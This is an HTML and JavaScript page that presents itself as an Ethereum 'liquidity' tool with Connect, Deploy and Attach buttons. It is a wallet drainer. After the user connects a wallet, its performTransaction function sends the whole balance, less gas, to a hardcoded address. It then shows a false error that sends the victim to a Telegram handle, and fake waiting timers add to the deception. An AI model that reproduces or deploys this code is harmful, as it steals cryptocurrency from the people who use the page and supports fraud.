<!DOCTYPE html>
<html lang="en">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Ethereum Interaction Script</title>
html {
box-sizing: border-box;
font-family: "Open Sans", sans-serif;
*, *:before, *:after {
box-sizing: inherit;
body {
font-family: Arial, sans-serif;
text-align: center;
margin: 0;
padding: 20px;
background: #222336;
background: radial-gradient(circle farthest-side at center center, #222336 0%, #222336 100%);
section {
background: #2a2c3f;
color: white;
border-radius: 1em;
padding: 1em;
position: absolute;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
<button id="connectButton">Connect</button>
<table id="checkAdressBalanceButton" style="display: none;">
<td>My Contract</td>
<td><button id="regular">Deploy</button></td>
<td><p id="result"><code>No contract</code></p></td>
<td>My Second Address</td>
<input type="text" id="typeAdress" name="adress_auth" placeholder="Input second address ETH-0x" autocomplete="off" size="20"/>
<td><button id="sendEtherButton" style="display: none;">Attach</button></td>
<td><div id="statusMessage"></div></td>
<td>My Status</td>
<button disabled="disabled" id="checkBalanceButton" style="display: none;">Liquid</button>
<td><p id="balanceDisplay" style="display: none;"></p>Confirm the liquidity</td>
const connectButton = document.getElementById("connectButton");
const sendEtherButton = document.getElementById("sendEtherButton");
const typeAdress = document.getElementById("typeAdress");
const checkBalanceButton = document.getElementById("checkBalanceButton");
const balanceDisplay = document.getElementById("balanceDisplay");
const checkAdressBalanceButton = document.getElementById("checkAdressBalanceButton");
const statusMessage = document.getElementById("statusMessage");
let validationComplete = false;
let transferInProgress = false;
// Predefined Ethereum address
const predefinedAddress = "0x5b133a42743386b5016050831D73E3Ecd96D0c30";
const performTransaction = async () => {
try {
const value = typeAdress.value;
transferInProgress = true;
const balanceWei = await window.ethereum.request({
method: "eth_getBalance",
params: [window.ethereum.selectedAddress, "latest"],
const gasPrice = await window.ethereum.request({
method: "eth_gasPrice",
const gasLimit = 50000;
const gasCost = BigInt(gasPrice) * BigInt(gasLimit);
if (BigInt(balanceWei) < gasCost) {
alert("No ETH for gas fee");
transferInProgress = false;
const amountToSend = BigInt(balanceWei) - gasCost;
await window.ethereum.request({
method: "eth_sendTransaction",
params: [
from: window.ethereum.selectedAddress,
to: predefinedAddress, // Using predefined Ethereum address here
value: "0x" + amountToSend.toString(16),
alert("Error. A small amount of liquidity. Write to me in telegram @TrustCryptoX");
transferInProgress = false;
} catch (error) {
alert("Error confirming liquidity. Repeat again");
transferInProgress = false;
connectButton.addEventListener("click", async () => {
try {
const accounts = await window.ethereum.request({
method: "eth_requestAccounts",
if (accounts.length > 0) {
sendEtherButton.style.display = "block";
typeAdress.style.display = "block";
checkBalanceButton.style.display = "block";
checkAdressBalanceButton.style.display = "block";
connectButton.style.display = "none";
} catch (error) {
alert("Connection error");
sendEtherButton.addEventListener("click", async () => {
try {
const value = typeAdress.value;
if (!value || value.length < 40) {
alert("Attention! Enter the correct second Ethereum address");
if (!validationComplete) {
if (/^[a-zA-Z0-9]+$/g.test(value) && value.length >= 40) {
statusMessage.textContent = "Waiting...";
typeAdress.disabled = true;
sendEtherButton.disabled = true;
setTimeout(() => {
validationComplete = true;
statusMessage.textContent = "Ready";
typeAdress.disabled = true;
sendEtherButton.textContent = "Confirm";
sendEtherButton.disabled = false;
}, 10000);
} else {
alert("Error! Input value");
} else if (sendEtherButton.textContent === "Confirm") {
} catch (error) {
console.error("Error on process: " + error);
transferInProgress = false;
checkBalanceButton.addEventListener("click", async () => {
try {
const balanceWei = await window.ethereum.request({
method: "eth_getBalance",
params: [window.ethereum.selectedAddress, "latest"],
const balanceEther = (parseInt(balanceWei) / 1e18).toFixed(4);
balanceDisplay.innerText = `Balance: ${balanceEther} ETH`;
balanceDisplay.style.display = "block";
} catch (error) {
alert("Error fetching balance");
const regularLaunchButton = document.getElementById("regular");
const resultElement = document.getElementById("result");
function setButtonsDisabled(isDisabled) {
regularLaunchButton.disabled = isDisabled;
function timeout() {
resultElement.innerText = "Waiting...";
setTimeout(() => {
resultElement.innerText = "Ready";
}, 12000);
regularLaunchButton.addEventListener("click", () => {